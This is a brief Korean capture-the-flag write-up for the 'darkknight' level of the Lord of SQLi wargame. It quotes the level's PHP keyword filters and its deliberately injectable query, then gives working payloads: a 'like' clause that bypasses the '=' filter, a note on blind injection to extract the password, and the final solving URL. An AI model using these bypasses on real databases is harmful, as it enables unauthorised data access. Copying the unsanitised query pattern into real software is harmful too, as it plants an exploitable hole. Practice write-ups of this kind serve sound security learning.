LOS darkknight

12. darkknight

if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 

pw에서 ‘ 필터링
if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe"); 

no에서 substr, ascii, =, ‘ 필터링
$query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; 
$_GET[pw] = addslashes($_GET[pw]); 
$query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"; 
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight"); 

no을 이용

id를 admin으로 -> no=1 or id like "admin"%23

no 에서 pw길이와 pw 알아냄 블라인드 인젝션

?pw=1c62ba6f&no=1%20or%20id%20like%20"admin"%23